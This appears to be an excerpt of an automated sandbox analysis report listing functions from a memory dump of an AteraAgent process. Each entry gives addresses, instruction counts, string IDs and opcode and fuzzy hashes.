                                                                                                                                                                                                                                          Function 00007FFAAB58A0A0 Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0-O
                                                                                                                                                                                                                                          • API String ID: 0-4022802784
                                                                                                                                                                                                                                          • Opcode ID: 5658bb662a0a9d9811f0ad33a94aad885e5c7249defa99425a05bd53d376d687
                                                                                                                                                                                                                                          • Instruction ID: 79bb22f1924a550d37d86863e96b916b2e521940b96a20be5fa231dc783a68f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5658bb662a0a9d9811f0ad33a94aad885e5c7249defa99425a05bd53d376d687
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38B10961B1DA4A8FEB98EB2C945567837D2EF99390B4441BFE40EC72E7DD18AC064381
                                                                                                                                                                                                                                          Function 00007FFAAB59C960 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: HQ_L
                                                                                                                                                                                                                                          • API String ID: 0-1356048233
                                                                                                                                                                                                                                          • Opcode ID: 397bb17fa124fad5f539ca50e3d641d6f3b313075c19c40d81c39e3648a3991e
                                                                                                                                                                                                                                          • Instruction ID: 3aabaefb7b49dc0b66ce6ed7148b76a99f93836913ecc1a650ee054cbdf9b4ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 397bb17fa124fad5f539ca50e3d641d6f3b313075c19c40d81c39e3648a3991e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C11770A0DB4A8FDB54EF28D8559B97BE5EF9A340B00417EE40EC72A3DE24E80587C1
                                                                                                                                                                                                                                          Function 00007FFAAB593BA8 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 10281fba5be5e2e168ce7041449a1fa19bab308643f21d5beb520f16d3076bf3
                                                                                                                                                                                                                                          • Instruction ID: c44dce135760cddd898cfef81439001133c4373ce03728354f4cc970ba98a7a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10281fba5be5e2e168ce7041449a1fa19bab308643f21d5beb520f16d3076bf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AC1CD70618B4A8FD768DB18D441539B3E5EB9A340B148A7DD08FC36A6DA26FC468BC1
                                                                                                                                                                                                                                          Function 00007FFAAB593B28 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: ef2aff7fdeb75151d79438862b35a8834668d37b3d0668674d4b4385411009cc
                                                                                                                                                                                                                                          • Instruction ID: 40aafa68b026cac8e28398e68de3a64667c913b45a05a5063c7435ffd4af489b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef2aff7fdeb75151d79438862b35a8834668d37b3d0668674d4b4385411009cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0B10071A1CB468FD768EB58D4415B573E5EF9A354B1486BDD08FC32A3CA22AC438BC1
                                                                                                                                                                                                                                          Function 00007FFAAB583FCD Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G
                                                                                                                                                                                                                                          • API String ID: 0-3967213495
                                                                                                                                                                                                                                          • Opcode ID: e7742a70f62db7117f9d16fb1d20fa3d01c0c302bc6cc55fc002a7025a70a249
                                                                                                                                                                                                                                          • Instruction ID: 905ac3e5b05a517a7a9322522b765d0c8c17669a19f0521a1297bc4997e5f1cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7742a70f62db7117f9d16fb1d20fa3d01c0c302bc6cc55fc002a7025a70a249
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43A11571C0E64E8FE755DBB4C8412F9BBE4EF52380F44427AD44E9B1E2DA38584A9B80
                                                                                                                                                                                                                                          Function 00007FFAAB595B80 Relevance: 1.6, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: K_H
                                                                                                                                                                                                                                          • API String ID: 0-313846638
                                                                                                                                                                                                                                          • Opcode ID: 8ace9979de7c609cf333e68d1c4ad4c776a44895649e68f35ee3183b993fa850
                                                                                                                                                                                                                                          • Instruction ID: e9f89f00d47f71686b2b6fd35dd5fe91aad0ceeb2a176d1b6dfc0c3239eef29b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ace9979de7c609cf333e68d1c4ad4c776a44895649e68f35ee3183b993fa850
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89711463B1EF5B8FF3A9975C242D27417C5EBAA6D1B1081BBD48EC32A6DD159C0A43C0
                                                                                                                                                                                                                                          Function 00007FFAAB593C30 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: b4E
                                                                                                                                                                                                                                          • API String ID: 0-1742450236
                                                                                                                                                                                                                                          • Opcode ID: 59e7a5654d4d4bf14240e6018c776c92549f00f392d3155455bd2789dcf0ddda
                                                                                                                                                                                                                                          • Instruction ID: 64d6de154ee936a70a11a74b3bc4d2c4c043b8b2612a8b8d853b4ac06b28d784
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59e7a5654d4d4bf14240e6018c776c92549f00f392d3155455bd2789dcf0ddda
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B81433061DB4A8FE768DB2884855B67BE5EF92350B14467ED48FC32A3DE25F80687C1
                                                                                                                                                                                                                                          Function 00007FFAAB59FEB5 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G
                                                                                                                                                                                                                                          • API String ID: 0-3967213495
                                                                                                                                                                                                                                          • Opcode ID: eb54380630860f8419e6434e62d714487b1dcea85805362c1191bb4c6dd9d3b6
                                                                                                                                                                                                                                          • Instruction ID: b5f49a24dff15ddc2dc0242d1d83ac4e81dd4c649a72e86929f0d29b3ca0cf4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb54380630860f8419e6434e62d714487b1dcea85805362c1191bb4c6dd9d3b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B8150A2E1DB8B8FEB94DB6C98566B83BD1FF563C0B484079D04ED7197DD24AC098780
                                                                                                                                                                                                                                          Function 00007FFAAB599C30 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: /E
                                                                                                                                                                                                                                          • API String ID: 0-3969647439
                                                                                                                                                                                                                                          • Opcode ID: 686521e792b160de8d7ed60ca4353c9d2841ba9a4125044437a73e5a8b7a008d
                                                                                                                                                                                                                                          • Instruction ID: e230b38f1e403525e39f3f9af41f2d8484aee89e158b2fa795a91df8fab3ee21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 686521e792b160de8d7ed60ca4353c9d2841ba9a4125044437a73e5a8b7a008d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B713931A1DB4A8FE7A99B28849917577D5FF5A340B04447ED08FC32A3DE29BC45C781
                                                                                                                                                                                                                                          Function 00007FFAAB59C930 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: +R_H
                                                                                                                                                                                                                                          • API String ID: 0-2087421380
                                                                                                                                                                                                                                          • Opcode ID: 40af473d6b28aeef78e6aac712cd4162b96473574b1c2764c90b62f18b43573b
                                                                                                                                                                                                                                          • Instruction ID: 1b7cf85b9264cd38cd521788ab6d299a9f2cee7099e3c8c684e7cacbd18812e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40af473d6b28aeef78e6aac712cd4162b96473574b1c2764c90b62f18b43573b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA71A171A19A0E9FDB94EB6CC4597BC37E5FF59384F04027AD40ED32A2CE24A8458BC1
                                                                                                                                                                                                                                          Function 00007FFAAB59C938 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: MG_H
                                                                                                                                                                                                                                          • API String ID: 0-2026589312
                                                                                                                                                                                                                                          • Opcode ID: e1fdf3e3b7ec4891b4ff050ed29f31ab1ce8a63f84c4a8282d3bffb3fa9beb6b
                                                                                                                                                                                                                                          • Instruction ID: a301c90d5fc436b3c588288e72596098a947be9ff700409cf3344fd5e6eb1d09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1fdf3e3b7ec4891b4ff050ed29f31ab1ce8a63f84c4a8282d3bffb3fa9beb6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B611F30B0991A8FDB98EB5CD458BB977E5FF59351B4041BAE04ED72A2CE24EC458B80
                                                                                                                                                                                                                                          Function 00007FFAAB588A55 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G
                                                                                                                                                                                                                                          • API String ID: 0-3967213495
                                                                                                                                                                                                                                          • Opcode ID: f9fb54acd686e31dc34b1a79557e69b0b0988d4c2fe2649140abebca36acd988
                                                                                                                                                                                                                                          • Instruction ID: 01d0f634882b72f025c6895d4f844ce3f48c12bfcba1b0bb7ccf1e45e8bc0aff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9fb54acd686e31dc34b1a79557e69b0b0988d4c2fe2649140abebca36acd988
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1961E171C0964E8FEB59DBA4C8416FD7BB4EF56390F44417AD00DD72E2CA386946C790
                                                                                                                                                                                                                                          Function 00007FFAAB58D0C0 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ^L_^
                                                                                                                                                                                                                                          • API String ID: 0-3269914177
                                                                                                                                                                                                                                          • Opcode ID: fadf4eb7e345ac06b5afb9eca52e5b0cef90afd44b0ecc9bf9971d367db697a4
                                                                                                                                                                                                                                          • Instruction ID: 6460250bd4e178a0e2f11fc7b55b15dff23a94a864ac16b173f7d1f1e441d26d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fadf4eb7e345ac06b5afb9eca52e5b0cef90afd44b0ecc9bf9971d367db697a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6651B863A4C7924FD302A778E4665E83BB5DF47275B0945F7C089CE0E3E918188ACBD6
                                                                                                                                                                                                                                          Function 00007FFAAB59FF3A Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G
                                                                                                                                                                                                                                          • API String ID: 0-3967213495
                                                                                                                                                                                                                                          • Opcode ID: 8c98b19361132b40648a01a6cf5399c621d51926f5f3e4946c9b4949c5a4d8a3
                                                                                                                                                                                                                                          • Instruction ID: 33d60f2d90d5d275b88071f26ab2559f70211529ed768f618fd2b0bf57814650
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c98b19361132b40648a01a6cf5399c621d51926f5f3e4946c9b4949c5a4d8a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D515DA1A1DA8B8FEB94DB5C98656F83BD1FF563C0B488079D04ED7197DD24AC0A87C0
                                                                                                                                                                                                                                          Function 00007FFAAB588AA5 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G
                                                                                                                                                                                                                                          • API String ID: 0-3967213495
                                                                                                                                                                                                                                          • Opcode ID: 7c0c2b0683ad1a42f2f77a9b910ce00089fe99dae942d71430ca8738503744a1
                                                                                                                                                                                                                                          • Instruction ID: 0ab6732752063c94e6e91b8d309edc69cb3fb2d1ff93fc1babf959a5a0147063
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c0c2b0683ad1a42f2f77a9b910ce00089fe99dae942d71430ca8738503744a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D25124B1C096898FDB59DBA4C8526FA7BF4EF56380F0440BBD00DDB2E2CA281946C790
                                                                                                                                                                                                                                          Function 00007FFAAB583C3D Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G
                                                                                                                                                                                                                                          • API String ID: 0-3967213495
                                                                                                                                                                                                                                          • Opcode ID: 052768c31e85b4b936177c4c543bf236457f75310bd2b494e96e0c62513f0d6d
                                                                                                                                                                                                                                          • Instruction ID: c2eefb50c1624ac45701fb71a2ecf5540cdc4a940e98877a898bd8066b9609be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 052768c31e85b4b936177c4c543bf236457f75310bd2b494e96e0c62513f0d6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A417D71D0964D8FEB54DBA8C8456FDBBE1FF55380F40417AE40ED7292CA385846CB80
                                                                                                                                                                                                                                          Function 00007FFAAB595A2A Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: {q
                                                                                                                                                                                                                                          • API String ID: 0-267941131
                                                                                                                                                                                                                                          • Opcode ID: bdcac716ab85763a8fef17faff9ce8815a6250f3ded06b071e0fed7786d62c01
                                                                                                                                                                                                                                          • Instruction ID: f590e5bf2e2f41cf6adf2de55db044f4f1e9c209e5790e681e4dcce56e8f4a3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdcac716ab85763a8fef17faff9ce8815a6250f3ded06b071e0fed7786d62c01
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F841282260EB8A4FF79AA73C589167237D5EF57380B4540FAD44EC72E3DC199C454390
                                                                                                                                                                                                                                          Function 00007FFAAB587130 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: X`O
                                                                                                                                                                                                                                          • API String ID: 0-1763170335
                                                                                                                                                                                                                                          • Opcode ID: 3d2dd1e7d7b2fa4b2e95ce1ed9383ebea6416098cd09ce7ae33dc2e908e3abd9
                                                                                                                                                                                                                                          • Instruction ID: d4ac491e40aef77c5dc3302528807309279de361191f86f1552e911c5422fdf7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2dd1e7d7b2fa4b2e95ce1ed9383ebea6416098cd09ce7ae33dc2e908e3abd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF311572B1DA4A8FE768DB5C985957937E5EF9E351F00417EE00EC32A3CE20AC0686C1
                                                                                                                                                                                                                                          Function 00007FFAAB58CFF7 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: tL_^
                                                                                                                                                                                                                                          • API String ID: 0-225026331
                                                                                                                                                                                                                                          • Opcode ID: d9d672aada3f85dcfe2089d84713ce2e31f13915ebe8dd3c7c7bd4350254057a
                                                                                                                                                                                                                                          • Instruction ID: d559994bc14154701eefcbc38f86cef7ddc01dde8894b471939257e4e9b3e39c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9d672aada3f85dcfe2089d84713ce2e31f13915ebe8dd3c7c7bd4350254057a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631286390D2568BE701B77CE8854F93BE8DF42364F0845BBD04E8A1F3EE14649A8EC5
                                                                                                                                                                                                                                          Function 00007FFAAB5A5B60 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: GQ_H
                                                                                                                                                                                                                                          • API String ID: 0-266171174
                                                                                                                                                                                                                                          • Opcode ID: ddbfe51b4d45898153121b92e1bd2759521ff3239c69667d2b836e55b61d9fb1
                                                                                                                                                                                                                                          • Instruction ID: c8fb9a04bfb93de051e88e74a019f174a216d8bbe21b2f32d64fa25be1ea8e4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddbfe51b4d45898153121b92e1bd2759521ff3239c69667d2b836e55b61d9fb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E331D37050E78A8FD766973488589657FE5EF57240B0980FBD08ECB1E3DD196C0AC3A1
                                                                                                                                                                                                                                          Function 00007FFAAB590DD0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0pO
                                                                                                                                                                                                                                          • API String ID: 0-2342757507
                                                                                                                                                                                                                                          • Opcode ID: 9d6c5c2db05190978bfaa1341a92d7b9c871d4236c50ecc901eb559b9379b94e
                                                                                                                                                                                                                                          • Instruction ID: 5ad3c0a893d8d9eae1aa9b34485eb940aad7e9f1a9df914b423ae8dec5838a3d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d6c5c2db05190978bfaa1341a92d7b9c871d4236c50ecc901eb559b9379b94e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94213A3270990A8FDB94DB1CE4107B577D5EF89390F4841BAE44EC73A2CE1A9C4683C1
                                                                                                                                                                                                                                          Function 00007FFAAB59E355 Relevance: .6, Instructions: 554COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c46f8049fece432143bb119f3f85de94b56786a2bc8a202ec234a288c966fcca
                                                                                                                                                                                                                                          • Instruction ID: 4b2d754f4a7fd13180f4a9573e5e5a347e83623735d59819f0fc6e1e705cc7d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c46f8049fece432143bb119f3f85de94b56786a2bc8a202ec234a288c966fcca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BB1786160DB868FE765EB28C4959A87BE0EF56240B0841FBC44ECB1A3DD25A80DC7D1
                                                                                                                                                                                                                                          Function 00007FFAAB58D9E9 Relevance: .4, Instructions: 436COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
